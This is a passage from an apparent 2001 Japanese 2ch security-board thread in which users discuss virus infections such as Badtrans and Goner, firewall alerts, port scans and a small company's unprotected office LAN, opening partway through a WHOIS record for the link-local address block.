4676 Admiralty Way, Suite 330
Marina del Rey, CA 90292-6695
US

Netname: LINKLOCAL
Netblock: ***.***.0.0 - ***.***.255.255

Coordinator:
Internet Corporation for Assigned Names and Numbers (IANA-ARIN) res-ip@iana.org
(310) 823-9358

Domain System inverse mapping provided by:

BLACKHOLE-1.IANA.ORG 192.0.32.18
BLACKHOLE-2.IANA.ORG 192.0.32.19

Record last updated on 12-Oct-2001.
Database last updated on 2-Dec-2001 19:54:36 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


上の***の範囲内のIPが入ってました。
他のPCが立ち上がっているときは、そちらに「IPがかち合います」って警告もでてきます。
そのときは問題のPCのほうはプロトコルが壊れていますってでてきます。

112 :106:01/12/04 00:51
手元のNISを入れておそるおそるアクセスしてみたら、見慣れたIP範囲になりました。
なぜルーターでは反応しなかったんだ…

しょうがないので明日NISもういちライセンス買って直繋ぎします(´ヘ`;)ハァ

113 :名無しさん@お腹いっぱい。:01/12/04 01:58
hotmailのメールがちょくちょく消えます。ここは広告メール置き場にしているのですが、
たまにここに友達からメールがくる時があります。
そして消したはずはないのに、いつのまにかそういう個人的なメールだけ消えてるんです。広告メールはしっかり残ってるのですが
最近多いんですが、誰かに侵入されてるのかな?

114 :名無しさん@お腹いっぱい。:01/12/04 04:27
っつーか、pwd盗まれただけじゃねぇかそれ?idと同じとかだったんじゃ?
どうでもいいがhotmailって、XPの初期設定でidとらにゃならんから
ますますジャンクメールのターゲットにされてるだろ。
OSたちあげて最初に屑広告読ませるためにバルーン立ち上がるのうざすぎ。

115 :95:01/12/04 10:39
95っす。スレ見つけたので移動してきマス。

116 :名無しさん@お腹いっぱい。:01/12/04 20:35
今日ルータのログを見て知ったんだが
数分ごとにポート番号を増やしながらスキャンしてくるやつがいる
ログ容量の関係でいつから始まったかわからないんだけど
現在55000番台に突入してる
65536までいけば収まるんだろうけど(また初めからやらねーよな・・・)
危ないポートは塞いでるから心配はなさそうだが
なんかいやーんな感じだ
ちなみに発信元IPは 207.195.141.162
Cm2.comってとこが管理してるIPだった

117 :名無しさん@お腹いっぱい。:01/12/04 22:07
ウイルスバスターの不正アクセスのログは対して気にしなくて良いと
知っているが、暇だったんでどんな所から来てるんだとドメイン
調べたら化粧品のノエビアと出た。
漏れは男だが、何か利用価値あるのか?(藁

118 :  :01/12/04 22:22
>>117
いずれ嫁さんもらうだろうと思われているかも。
冗談はさておき、男性用もあったり、健康食品その他に
業務拡大している場合が多いからなあ。
ノエビアがどうなんかは知らないよ、実のところ。

119 :名無しさん@お腹いっぱい。:01/12/04 23:01
ここの板(セキュリティー板)見たとたん、
ノートン君が反応しました。これはなんですか??

120 :>119:01/12/05 00:33
http://pc.2ch.net/test/read.cgi/sec/1005050509/168-169

121 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/05 01:09
ネット初めて早4年、未だにテレホでワッショイしてますが、
アンチウィルスソフト、持ってません(恥。
で、4日ほど前、ふと雑誌に付いてたVB2002の体験版を
入れてなんだかんだしてたら、どうやらウィルスには感染
していなかった模様。更に先ほどSymantecでオンライン
チェックをしてもらった所、大丈夫だよだって。
でも、いい加減対策ソフト買おうと思います。来年は。
しかし、よく感染してなかったなぁ・・・。

122 :名無しさん@お腹いっぱい。:01/12/05 01:22
>>121
ウイルス警備隊V3
http://www.neic.co.jp/pc/keibi.html

強く勧める。人柱報告求む。

123 :名無しさん@お腹いっぱい。:01/12/05 02:05
>>121
これ おすすめ
無料だから 使ってみて嫌だったら ほかのにすればいいし

H+BEDV Antivir Personal Edition
http://pc.2ch.net/test/read.cgi/sec/1004122172/l50

124 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/05 02:43
122,123さん、どうもです!
いろいろ見てみて、決めたいと思います。
とりあえず今年は体験版にお任せして・・。
しかし、VB起動時のリソースの空き、24%て・・。
XPにしたいけど、4年前のポンコツマスィンじゃなぁ。
当時は30マソしたのに!(苦笑

125 :名無しさん@お腹いっぱい。:01/12/05 03:14
>>124
その体験版ってアップデート出来るの?
ウィルスは すぐに新種が出るから
頻繁に更新したほうがいいですよ

ウィルスバスターって重いらしいですね
詳しくは>>2-10の どこかにある
ウィルスバスターのスレを見てね

126 :名無しさん@お腹いっぱい。:01/12/05 03:16
>>118
管理者の頭痛の種であるところのドキュソ社員の仕業じゃないの?
・調子こいて(愚かにも)社内からポートスキャンしてる
・あれだけ騒ぎになってもまだIE5.xSP2をあててない
等々

127 :(・∀・)イイ!! 気分さん ◆BywaraGE :01/12/05 03:19
>>125さん
さっき試みたら「製品買え!ゴルァ!」と
言われちゃいました。     ちぇ。

128 :名無しさん@お腹いっぱい。:01/12/05 03:38
>>127
だったらAntiVir使ってみたら?

基本的に全然 設定変更や操作とかしないし
スレに載ってる参考ページ見て
どうしてもわからないことがあればスレで質問すれば
あと そのままほったらかしてても 特に問題無いですし

129 :名無しさん@お腹いっぱい。:01/12/05 03:56
W32/Goner-A来た人いる?

MS01-020の件を利用してるかどうかの情報キボンヌ

W32/Goner-Aについては
http://www.sophos.com/virusinfo/analyses/w32gonera.html
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=WORM_GONE.A&VSect=T
まだこの辺くらいしか情報なさげ

rooterでICQ,IRCにつかってるポート,フィルタリングしてしまったほうがよいのかな

130 :名無しさん@お腹いっぱい。:01/12/05 06:30
初心者なものでよくわかっておらず質問することをお許し下さい。
ZoneAlarmを導入して半月ほどになるのですが
本日になって初めてExplorer.exeが外部に接続しようとするものを
ZoneAlarmが検出しまして、今までには一度もなかったことなので
何か不安になって許可を出しませんでした。
それ以降はExplorer.exeが外部に接続しようとすることはないのですが
なんだったのかわからず不安でたまりません。
Explorer.exeが本来の仕様の範囲内で外部への接続を
試みることはあるのでしょうか?
もしあるのでしたらそれはどういう目的で行なわれるのでしょうか?
それとも何かしらのトロイの侵入を許してしまったのでしょうか?
詳しい方がおられましたらどうか教えて頂けますようお願いします。

環境:Windows98SE(IE6,OE6 主要パッチ当て済)、ZoneAlarm ver.2.6.357
ZoneAlarmのログ:PE,2001/12/05,04:42:35 +9:00 GMT,Windows エクスプローラ,127.0.0.1:1594,N/A

131 :130:01/12/05 07:27
追記ですがAntiVirusの最新定義でのチェック及び
トレンドマイクロ社のNimdaA〜E、Code Red1,2、BADTRANS.Bの
単体でのチェックツールも試してみましたが
何も検出されませんでした。
またExplorer.exeの状態は場所はC:\WINDOWS以下で
ver.4.72.3110.1です。

132 :名無しさん@お腹いっぱい。:01/12/05 08:45
ある掲示板で
「HTMLメールとCCメールを送ったら相手が怒った。そんなことで
怒るなよ」的な書き込みに対して

「私もつい先日まで知りませんでしたよ、そのHTMLメールが
なんちゃらっていう話。ついでに言えば、私の職場の上司なんて、知っていても直してませんよ。
「面倒くせえ」だそうです。

あ、ちなみに、私の職業はSEです。その「面倒くせえ」の上司は、パソコンを
使ってソフトの開発をしている人物で、いわば、その道のプロです。

HTML形式の方が好きだし、そうでなくともウイルスなんてウヨウヨ
新しくでてくるんだからさあー、振り回されるよりも、データのセーブ
をこまめにやってた方がいいよ・・・・だそうです。

ウイルスが怖いのはだれしも一緒ですけど・・・振り回されすぎもどうでしょうねえ。
このスレッドには、ずいぶんと振り回されているヒトが多いように
見受けられますが。

ましてや、「知らない」ことをこんなにバカにするヒトがいるなんて・・
驚きですなあ。」

というレスが付いた。
どっちがドキュソ?

133 :  :01/12/05 09:00
>>130
ZoneAlarmのスレ見てみるべし。
時間がないなら、日本語化パッチを出しているサイトへのリンクが
始めの方にあるから、そこだけでも読んでおくといいよ。
いろんな場合があるてのは分かるから。

134 :名無しさん@お腹いっぱい。:01/12/05 09:00
レスつけたヤツは間違いなくドキュソ。
「面倒くせえ」の上司は判っててやってる節があるな。
ただHTMLメールを送ってるんなら問題ありだと思うが。

135 :  :01/12/05 09:01
>>132
自分だけ良かったら、という輩はとりあえずスタンドアローンで
なんかやっててほしいもんだな。

136 :きき:01/12/05 09:03
初めて、ウィルスに感染してしまった初心者です。
お恥ずかしい質問ですが、お許し下さい。
ウィルスでは?というメールが来て、自分の感染を知りました。
表示されているのが、stuff.mp3.pifだったので、調べてみて、
Badtransというものだと判断し、駆除のファイルをダウンロードして、
対策を打ってみました。
で、確認のためにオンラインウィルスチェックをしたら、
HAP_HAPTIMEといものに、50ファイル感染していました。
これは、別のウィルスですよね?
今の私のパソコンには何をすればいいのでしょうか?
本当に初心者で申し訳ありませんが、
海外にいるため、非常に心細いです。
アドバイス、いただければ幸いです。お願いします。

137 :名無しさん@お腹いっぱい。:01/12/05 09:07
>136
初期化汁

138 :きき:01/12/05 09:12
>>136さん
どこをどう初期化するのですか?
教えてちゃんですいません。

139 :名無しさん@お腹いっぱい。:01/12/05 09:13
>138
ぱそこんをかったときのじょうたいにもどすんだよ
でーたもみんなきえるけどういるすもきえるよ

140 :名無しさん@お腹いっぱい。:01/12/05 09:22
>138

139さんの言うとおり、初期化するのが確実な駆除になります。

それが嫌だったら
ttp://www.symantec.com/region/jp/sarcj/data/v/vbs.haptime.fix.html
でも見てみることをおすすめします。

141 :きき:01/12/05 09:22
>>139さん、ありがとうございます。
では、今のデータはどこかに保存して、初期化すればいいのですね。
とはいったものの、一人でやりこなせるのか不安です。
でも、人に迷惑をかけてはいけないので、やってみます。
パソコンを開けると、 メモリ不足のため。。。というのが
頻発するのですが、これもウィルスのせいなのですか?
教えてください。宜しくお願いします。

142 :名無しさん@お腹いっぱい。:01/12/05 09:27
>>76

すごい遅レスだけど、私W95でIE5.5SP2ちゃんと動くよー
パソコン注文する時点でメモリ120以上入れてもらったりしたからかも
しれないけど。

143 :名無しさん@お腹いっぱい。:01/12/05 09:28
思ったんですが、今回の件で意外とウイルス対策してない、というか
パソコンのこと自体わかってない人多いのねーと思った。
2年もネットやってて「ウイルス対策のソフトってどんなのあるの?」
ていう人いたの。ひどい人では「インストール」の方法も知らない!
IEのアップグレードが無料で出来ることも知らない!
(有料だと思ってたから何もしなかったんだって・・・)

NIMDAの時点で
「もう危ないサイトに行かなければ大丈夫、なんて全然通用しなくなったな」
と思ったのに・・・なんでこんなにみんな危機感ないのかとても不思議だった。

144 :名無しさん@お腹いっぱい。:01/12/05 09:39
>>143
>「もう危ないサイトに行かなければ大丈夫、なんて全然通用しなくなったな」

セキュリティーパッチをこまめにあててあれば、今でも「大丈夫」でしょ?

145 :名無しさん@お腹いっぱい。:01/12/05 10:02
>144
ああ、うん。そうです。すんません。
「危ないサイトに行ってないから、ウイルスなんて縁はない」
とでも言い直します・・・
何もしなくても大丈夫、と思ってる人のことを言ったつもりでして・・・

146 :名無しさん@お腹いっぱい。:01/12/05 13:31
1 ■『ドリームキャスト』ゲームでウイルスに感染 ■
<http://www.hotwired.co.jp/news/news/20011204301.html>
クールキッズが発売した、セガ『ドリームキャスト』専用RPGゲー
ムのCD-ROMが、ウイルス『W32/Kriz』に感染していることがわかっ
た。このウイルスは、12月25日になると、感染したコンピュー
ターのシステムBIOSを破壊し起動できなくするという非常に破壊
力の強いウイルスだ。

147 :名無しさん@お腹いっぱい。:01/12/05 13:53
こちらから逝け
http://www.hotwired.co.jp/news/news/Technology/story/20011204301.html

148 :名無しさん@お腹いっぱい:01/12/05 14:47
でも、確かに多いですよね。「何もしなくても、私は変なHPにいかないからウィルスとは無縁なのだ」と思っている人。
だから、何かの縁でFirewallでも、いれようものなら、「○○(IP)から、不正アクセスがある。どうしよう」とか、
ひどい人になると、プロバイダからのIP取得のすら、「なんかしつこいハッカーがいるんですけど、どうしたらし返しできるんですか?」とか聞いてくる。

あのな、自分で何も学ばずに何を言うとるんや。お前。て、感じだ。

149 :名無しさん@お腹いっぱい。:01/12/05 23:18
>>144
いわゆる「ブラクラ」は防げない可能性があるよ。
NT系なら平気だろうけど。

150 :某社のパート:01/12/05 23:24
質問です。
30台ぐらいのPCをLANでつないでる中小企業の場合、
どの程度のセキュリティーをすればいいでしょうか。

今現在は以下のようなお粗末過ぎる状況です。

インターネット==ISDNルーター==社内LAN

メールサーバーなどのサーバーは動かしてないです。(触れる人居ないし)
ファイアーウォールは設置してません。
アンチウイルスソフトは、インストールしてあったりしてなかったり、
期限切れになってたりです。(情けない。。)

どなたかお返事ください。。

151 :名無しさん@お腹いっぱい。:01/12/05 23:32
>>150
今すぐテムプスタッフに電話しなさい。
オージンジ・オージンジで良いです。

152 :名無しさん@お腹いっぱい。:01/12/05 23:50
なんか今日ZAの警告なりっぱなしダヨ・・・これかいてる間にも5回も。
8月のCODE RED騒ぎの時にも凄かったけど、その時と同じくらいきてるよ・・。
・・・ってまた不正アクセスが。

153 :名無しさん@お腹いっぱい。:01/12/05 23:52
>>150
何をするかが分からない以上、30台に見合ったセキュリティーを施せとしか。
ただ、ルーターの真下に30本ぶら下げるのはどうかと。

154 :名無しさん@お腹いっぱい。:01/12/05 23:53
>>150
全てのPCに>>3-4のリンクにある
ZoneAlram(ゾーンアラーム)と
AntiVir(アンチウィルス?)  (2つ共 無料)
を入れてみたら どうでしょうか?
今の無防備な状態よりはいいと思います

155 :名無しさん@お腹いっぱい。:01/12/05 23:58
リンク更新

マカフィーってだめなの!PART2
http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

156 :某社のパート:01/12/06 00:18
みなさまお返事どうもです。

>151さん
「テムプスタッフ」は検索しても見つかりませんでした。
「オージンジ・オージンジ」は人材派遣会社のことかな。http://www.staffservice.co.jp/

人を呼べってことでしょうか?
でもたかただか80人程度しか社員のない会社で、
セキュリティー専門の人を常駐させるのはお金がかかりすぎる気が。。

>152さん
主にエクセルで作ったデータを各部署で閲覧&更新しています。
ほかは特になし。
会社にとって大事なファイルは、
一つのPCの中に置くようにしています。
ホームページは、外のレンタルサーバに置いています。
メルアドの数は、ホームページで公開している注文受付用の
1つのみだと思います。

>ただ、ルーターの真下に30本ぶら下げるのはどうかと。
たとえば何を間にかませばいいんでしょうか。

>154
その無料ソフトも使えそうにない人が多いので、
別の方法がいいです。。
(私も毎日出勤している訳じゃないですし)

>>150の今の状況の続きになりますが、
うちの会社、データのバックアップもとってないそうです。(-_-;)

157 :130:01/12/06 00:18
>>133
竜の情報館で仕様内の動作であることはわかりました。
ありがとうございます。
ただなんでExplorer.exeが外部に接続する必要性があるのかは
未だに謎のままなのですが 鬱
自分で多少調べようとしたのですがExplorer.exeで
検索かけるとCode RedUの情報ばかり引っ掛かってきて
実際にExplorer.exeが何をやってるかって情報とか
見つからないんですよね 鬱鬱
でもとりあえず安心できました。
改めてありがとうございました。

158 :名無しさん@お腹いっぱい。:01/12/06 00:19
150の会社は
サイバーテロ組織と認定されました(w

159 :某社のパート:01/12/06 00:35
>158
いやーん。(;_;)
でもほんとにヤバイですよね。
インターネットからのファイルのダウンロードがやけに遅いんですが、
トロイやスパイウェアを仕込まれてたらどうしよう。。
誰かに足場にされてる可能性もありますよね。。

160 :名無しさん@お腹いっぱい。:01/12/06 00:48
>>154
この場合、個人使用じゃないから無料じゃないと思われ。

161 :某社のパート:01/12/06 00:56
>>154さん
紹介してくださった無料ソフトですが、
スレや紹介しているページを読んでると評判がいいようなので、
とりあえず私のPCに入れて、操作がわかり次第、
私が働いてる部署にあるPCに入れてみたいと思います。
ご紹介ありがとうございました。

162 :152:01/12/06 01:01
>>156
>主にエクセルで作ったデータを各部署で閲覧&更新しています。
>一つのPCの中に置くようにしています。
LAN上に鯖が無いということはメディアはフロッピー?なぜLANがあるのだ・・・。
>ホームページは、外のレンタルサーバに置いています。
>メルアドの数は、ホームページで公開している注文受付用の
>1つのみだと思います。
HPの管理は外部で作るのは内側?メールは30台とも使うの?

163 :某社のパート:01/12/06 01:02
あちこち見て使う気になったところに上のレスが。。
無料のはTinyしか使ったことはないですが、
他のも個人使用じゃない場合は無料で使えないんですね。。

164 :名無しさん@お腹いっぱい。:01/12/06 01:09
1台か2台だけ
WANにつなぐ というのは?

あとはLAN

165 :某社のパート:01/12/06 01:15
>152さん
> LAN上に鯖が無いということはメディアはフロッピー?なぜLANがあるのだ・・・。

フロッピーとMOがあります。(MOはほとんど使ってないですが)
LANはただつないで、ファイルの回し読み&書きをしてるだけみたいです。
で、あちこちのPCにファイルが分散してると探すのが面倒なので、
1つのPCの中にファイルを入れるようにしてるみたいです。

> HPの管理は外部で作るのは内側?メールは30台とも使うの?

HPは内部で作ってFTPであげてます。
メールを送受信するPCは会社としては1台だけでいいんですが、
個人でメルアドとって送受信してる人はいます。

>164さん
WANって言葉、はじめて見ました。
調べてみます。
今日はもうすぐ寝ちゃうので、
レスは明日(今日?)の夕方以降になります。

166 :名無しさん@お腹いっぱい。:01/12/06 01:24
ZoneAlarmのログを見てると、http(port80)とport6699の2つのポートへの
アクセスが目に付きます。前者はおそらくcoderedを始めとする一連のウィルスだと
思いますが、6699って何なんですか?
6699については、経験的に1〜数人が何度もしつこく突っついてくる感じです。
port 6699で検索かけたところ、どうやらNapster関連らしいのですが。
非ユーザーのPC(私はNapster系は一切使いません)に何度もアクセス
するのって何か意味があるんでしょうか?

167 :名無しさん@お腹いっぱい。:01/12/06 01:32
>>165
フィルタ無しで、各端末HD共有してるって、、、
タチ悪いウイルス1発混入するだけで最低1日は業務止まりそう。。。
WAN側だけ神経尖らせても不安一杯。
個人で外部にメーラー接続許してるし。。←恐らく、業務上コレの禁
止は現状だと無理でしょうし。。。
パートさん、大変だよぅ〜〜。
>>166
MXッテ、、シッテル??

168 :名無しさん@お腹いっぱい。:01/12/06 01:31
よくIEやOEでウイルスに感染したってカキコに対して
MS製品使うのやめろってレスが付くが
セキュリティ意識がしっかりしていて
対策を採っている人間なら
いくらMS製品使っても感染せんし、
逆にセキュリティ意識が低くて
何も対策してない人間は
何を使ってても感染すると思うのは俺だけか?

169 :名無しさん@お腹いっぱい。:01/12/06 01:43
>>168
漏れも同意。。
でも、セキュリティ意識しっかりしてるならMSなんか使わん
というあをりが、ココ板だとこの後来る(泣

ramenや1i0nだって、出たとき大騒ぎしたぢゃ無いか!!

170 :名無しさん@お腹いっぱい。:01/12/06 01:57
セキュリティ意識しっかりしてるならMSなんか使わん。
漏れ、セキュ意識しっかりしてないからMS使うけど。

ところで年末・年始に向けてIIS専用ウイルスもう1発来そうな予感。

171 :名無しさん@お腹いっぱい。:01/12/06 02:10
>>159
クソヲタがROMやMP3をダウソしてるんじゃないのか?(w
どういうネットワーク構成だか知らないけど、スイッチングHUBで
適当に分けたほうがいいような。

つか、某社のパート氏が
どれだけの権限を持ってるか知らないが、
・管理者の設置
・運用規定の作成
・教育の徹底
このへんをやらなくちゃならないと思うのだが
すでにパートの仕事じゃないです(w
お金が出ないんだったら
あまりかかわりあいにならないほうがいいような…

172 :名無しさん@お腹いっぱい。:01/12/06 02:54
>>170

winXPのPC→そういえばNT系→IIS・・・。→
→祭り開催→あぼーん

笑えない・・・。

173 :152:01/12/06 02:56
>>165
LAN内にhostが1つでファイル共有してるわけだな(鯖立ってんじゃん)。
ファイルの回し読み&書きと言うことは・・・
もしや、内部の人間なら誰でもどのファイルでも消せる(盗める!)?
まさかログインパス無しとか・・・ありそう(汗)。
分散しないように1台にまとめてるのか、かなりバックアップは楽だと思うが
(Winなら1回のDnDで済むじゃん)。

かなり暗黙の了解でNetworkが成り立っているような・・・。

174 :166:01/12/06 03:20
>>167
MXも6699を使うんですか?
でも
「非ユーザーのPC(私はMXも一切使いません)に何度もアクセス
するのって何か意味があるんでしょうか?」
という疑問は残ります…

175 :名無しさん@お腹いっぱい。:01/12/06 03:27
>>174
IP総なめされたんじゃないの?あんま深く考えなくても良いと思うけど。

176 :名無しさん@お腹いっぱい。:01/12/06 03:29
昔そのIPを使ってたヤツが
MXを動かしてたとか。

177 :名無しさん@お腹いっぱい。:01/12/06 03:29
>>174
多分前にMX使ってた人のIP貰っただけだよ。
俺もたまにある。

178 :名無しさん@お腹いっぱい。:01/12/06 11:03
IPスプーフィング対策としてルータがプライベートIPを通さないように設定したいんだけど
その場合遮断するのは10.0.0.0/8 172.16.0.0/12 192.168.0.0/16でイイの?
最後の/??の意味がいまいちわかんなくって...

179 :名無しさん@お腹いっぱい。:01/12/06 12:58
>178 netmaskで検索

180 :名無しさん@お腹いっぱい。:01/12/06 14:32
下らない質問です。
ウチの会社では
「IEは危ないからネスケにしよう」
「OutLookは危ないからネスケにしよう」
と盛り上がってます。
実はネスケってメーラもあるのかどーかも知らない自分、ドキュソですが
「ネスケだから安全だね」
という考え方は安直な気がします。
どんなもんでしょう?

181 :名無しさん@お腹いっぱい。:01/12/06 14:42
>>180
セキュリティ意識の低い奴は何使おうがやられる。

って同僚の人に言ってみて(w

182 :名無しさん@お腹いっぱい:01/12/06 15:23
>>180
>>181さんの発言に続けて、
「普段使っているソフトを変えると、ただでさえ遅い仕事が更に遅くなるかも。
なれれば良いんですけど、大丈夫ですか?」とも言ってみそ(w

183 :名無しさん@お腹いっぱい。:01/12/06 18:42
>>180の同僚みたいな奴が例の騒ぎの時、バックグラウンドでIIS立ててたりしたんだろう・・・

184 :名無しさん@お腹いっぱい。:01/12/06 20:14
ZoneAlarmやSygatePFはアプリの方向の許可の設定が出来ないから
敬遠される方も多いらしいですが、インバウンド接続が可能だと
具体的にどんな危険があるんでしょうか。

例えばブラウザやメーラーをインバウンド接続可能に設定しておくと
どんな危険があるでしょうか。

185 :名無しさん@お腹いっぱい。:01/12/06 20:48
>>184
つまり、ブラウザとメーラー、常駐で起動させてるんだね。君は。
んで、そのメーラーはMTAとしても機能する訳だ。
・・・・うっ、手動で転送すれば結局MTAなのか。。。

186 :質問:01/12/06 21:25
上級者の人に質問があります。

黒氷やらゾーンアラームやら色々と試してみたけど、結局は
ゴミパケットしか飛んでこない。深刻な不正アクセスは皆無
に近い。アングラサイトには行かないし、WinMXも使って
ないから長時間繋ぎっぱなしにすることもほとんどない。
あと、クレジットカードも使ってないし、見られたり盗まれたり
して困るものも一切入ってない。
・・・とまあこんな状況なので、システムを軽くしたいがために
一切のファイヤーウォールを入れないことにした。
果たしてこの選択は愚かなのだろうか?というより、俺と同じような
選択をしている人はいるのだろうか?
かなり頻繁にトロイチェック、ウィルスチェック、ADawareでスパイウェア
チェックをやってるが、一度も引っかかったことがないし、あと
キャッシュクリーンも定期的にしてる(クッキーは初めからOFF)。

なんでもいいのでご意見くれるとありがたいです。

187 :184:01/12/06 21:44
>>185
常駐で起動ではないですが、ブラウザは起動させてることが多いです。
その時ブラウザのインバウンド接続を可能にしていると
危険でしょうか?

188 :185:01/12/06 22:01
>>187
危険だと思えば切ってみれば良い。
あれ?と思ったら色々調べてみれば良い。

そのブラウザって、httpサーバーとしても機能するの?

189 :166:01/12/06 22:08
>>175-177
なるほど…レスどうもでした。

190 :のぅのぅこんなメール来てる?:01/12/06 23:14
SpyAgent's AMAZING Features:

今日2通も来たんだけどなにこれ?
今まで見覚えの無いスパム?とか広告メール来た事無いのに・・・・

191 :ささ:01/12/07 00:24
どなたか教えて下さい。
ネットで検索などする時、「インターネットへ情報を送信するときに、
その情報をほかの人から読み取られる可能性があります。」と出てくるんですが、
これって、ウィルスの影響ですか?

192 :名無しさん@お腹いっぱい。:01/12/07 00:32
>>191
放置。

193 :184:01/12/07 00:33
>>188
>そのブラウザって、httpサーバーとしても機能するの?

機能しません。
でもTinyスレの設定例でも、ブラウザの
インバウンド接続は許可してないみたいなので。
まあ自分で調べてみるか。

194 :ささ:01/12/07 00:38
>>192
とゆーことは、「今後、このメッセージを表示しない」にすれば良い
のですか?
何度もすみません

195 :名無しさん@お腹いっぱい。:01/12/07 00:42
「はがきを郵便ポストに入れると配達員に読まれるかもしれません」
ってのと同じ。

196 :ささ:01/12/07 00:44
安心しました。
ありがとうです。

197 :名無しさん@お腹いっぱい。:01/12/07 01:57
ちょっと質問なんですけどーーーーー
Re: 2001N3?I±\
ってタイトルのメールが届いてます。
前にダイエット食品のサンプルを送ってもらった会社から来てるんですけど、
ウイルスっぽいような気がしてこわくて開けないんですけど、やっぱりウイルスでしょうか?
内容が気になっても削除した方がいいんでしょうか?
ちなみにWEBのフリーメールです。

198 :名無しさん@お腹いっぱい。:01/12/07 02:06
webpdp_fsg_1050.exeってのがWin起動時に接続しようとするんですけど
こいつはいったい何なんでしょうか・・・
おわかりの方お願いします。

199 :名無しさん@お腹いっぱい。:01/12/07 09:26
>>198
その名前で自分のPC内検索してプロパティ見ろよ、頭わりぃな

200 :某社のパート:01/12/07 11:27
こんちわ。今日はパートお休みです。
私の日本語が変でうまく伝わってなかったので、
もう一度状況をまとめます。

インターネット==ISDNルーター==社内LAN(WindowsPC30台ぐらい)

・メールサーバーなどのサーバーは動かしてない。
・ファイアーウォールは設置してません。
・アンチウイルスソフトは、インストールしてあったりしてなかったり、
  期限切れになってたりです。
・重要なファイルは1つのPC(たぶん普通のwindowsPC)に置いて、
  それぞれの部署が読み込み&更新できるようにしています。
  (1つのファイルをA部とB部が更新したりする。)
・そのファイル置き場になっているPCのデータのバックアップは
  ときどきしてるらしいです。(きのう知った)他のPCはしてないです。
・ネットワークログインのパスワードは設定してなくて、
  ほかのPCのフォルダは丸見えだったような。
・メールの送受信するPCは会社としては1台でいい。
・インターネットへの接続は3台程度でいいと思う。
・社内LANは本社の建物のPCと50Mほど離れた所にある某部署の建物の
  PCに繋がっている。
・プリンタを共有している。

●最近知ったこと。
ファイアーウォールを設置する場合、非武装地帯というのをつくるらしい。

●まだわからないこと。
「WAN」
「普通のwindowsのパソコンでもファイル置き場として使ったら『サーバ』というのか」

お返事くださった方々感謝です。
会社のためというより、個人的に興味があるので、
ちょっと自分で雑誌や本を読んで調べてみます。
またなにか質問や進展があれば書きこみます。

201 :某社のパート:01/12/07 11:58
>>164さん
> 1台か2台だけ
> WANにつなぐ というのは?

PC数台だけインターネットにつないで、
他はつながないということでしょうか。
これは簡単かもしれない。
で、ウイルスソフトを全部のPCに入れて、
ネットワークのパスワードもせっていすると。
プリンタの共有はどうしよう。

202 :話題移動:01/12/07 15:14
BadaTransスレッドより

595 名前:くそDION :01/12/07 14:05
このウイルスさDIONから届いた奴おるか?


596 名前:くそDION :01/12/07 14:09
DIONに問い合わせたらさ何にも対応してくれんかったわ。
そのかわり、ええこと聞いたで!
加入者しか使われへんSMTPサーバさ、加入者以外でも使えるみたいやで。
で、結果そのSMTPサーバ使ってウイルス送られてるみたいや!

DIONなんとかせえや!


597 名前:名無しさん@お腹いっぱい。 :01/12/07 14:17
57通8通がDIONでしたが何か?
うち3人は警告メールにちゃんと謝罪・報告してきたし。
最悪はOCNで、12通あり返事ゼロ。
あとはbiglobe6通でこれも返事ゼロ。
プロバイダに文句いってみたことはないので、
そこらの具合は知らない。


598 名前:名無しさん@お腹いっぱい。 :01/12/07 14:18
>>596
説明の聞き間違いじゃないの?


600 名前:くそDION :01/12/07 14:22
>>598

あら、、DIONの方ね(w


601 名前:名無しさん@お腹いっぱい。 :01/12/07 14:37
>>600
少なくともこのウィルスに関しては故意にばらまいてるから
広まってる訳じゃないだろう?


602 名前:名無しさん@お腹いっぱい。 :01/12/07 15:07
「加入者以外でも使える」とかいう表現が疑問なんだよね。
まあ、プロバイダが○○すべし、とかいうのはちょっと前にも
議論があったところだし、あんまりこのスレでやるのもなあ。
やるんだったら雑談スレにでもいってやろうぜ。

203 :名無しさん@お腹いっぱい。:01/12/07 15:18
上記の話題をわざわざ持ってきたのは、ちょっと思い出したことがあったからで。
Hi-Hoネットから(いまごろ)ウイルスにご注意メールがきていて、
その中にHi-Hoから、
「お客様がどこそこに送ったメールにはウイルスが」
とかなんとかいうようなメールを送ることがあるぞ、てなことが
書かれていたもんで。
他になんか対応措置やっているプロバイダあるんだろうか。
俺は実は57通もらったやつで、なるべくならOCNが
なんかやってくれたらなあ、とちょっと思ったもんだったけど。
(もらった中にはHi-HOからのはなかったなあ。)

204 :ネット屋 ◆.t4dJfuU :01/12/07 15:41
>>203
送信で引っかかったのか、受信時に引っかかったのかの区別を激しくキボーン。
ただ、その問題より、「「加入者以外でも使える」とかいう表現が疑問なんだよね。」
の部分に共感。SMTPには元来認証プロセスが無いことをご存知なのだろうか。

205 :名無しさん@お腹いっぱい。:01/12/07 16:02
> 送信で引っかかったのか、受信時に引っかかったのかの区別を

ごめんなさい、ちょっと意味がわからんもんで。
・Hi-Hoからのメール
 どういうチェックをするとか、しているとかは書かれておらず、
 当方(Hi-Ho)からあんた(お客様)にそういう通知のメールを
 送ることがあるぞ、とあったのみ。
・俺がもらったメール
 送信者のアドレスより、使用プロバイダを数えた。

なんか質問の趣旨をとりちがえているようなきもするなあ。
ちょっと移動するので、次6時過ぎになります。

206 :203=205:01/12/07 17:50
6時前だけど。
まずは、Hi-Hoから送られたメールは、ご注意下さいてなことが書かれて、
でもってトレンドマイクロとかのURLがあってその後、
−−−−−−ここから引用−−−−−−
また、弊社(vcheck@hi-ho.ne.jp)より
下記のようなメールを受け取られた場合、
お使いのコンピュータが該当ウイルスに感染されていると
思われますので、この場合にも上記URLをご参照の上、
駆除など対策をお願いいたします。

あなたが○○○さんに送ったメール(添付ファイル:×××)
がウィルスに感染していました.

 ※ここで、○○○、×××は、
  ○○○:送信先メールアドレス
  ×××:添付ファイル名
  で、感染したウイルス、場合により異なります。
  文章も場合により多少異なる場合があります。
−−−−−−ここから引用−−−−−−
というもの。
どうやら、会員AがBに送ったメールがやられており、
BがAでなくHi-Hoに文句を言っていった場合には、
Hi-HoがAにこういうメールを送るってことではないかなあ。

Hi-Hoのサイトの情報では、有料のメールチェックサービス
(会員が受信時のみ。送信は対象外)について書かれていただけ。

忘れていたけど、
> SMTPには元来認証プロセスが無いことをご存知なのだろうか。
だから、POPを先にさせるプロバイダとか、
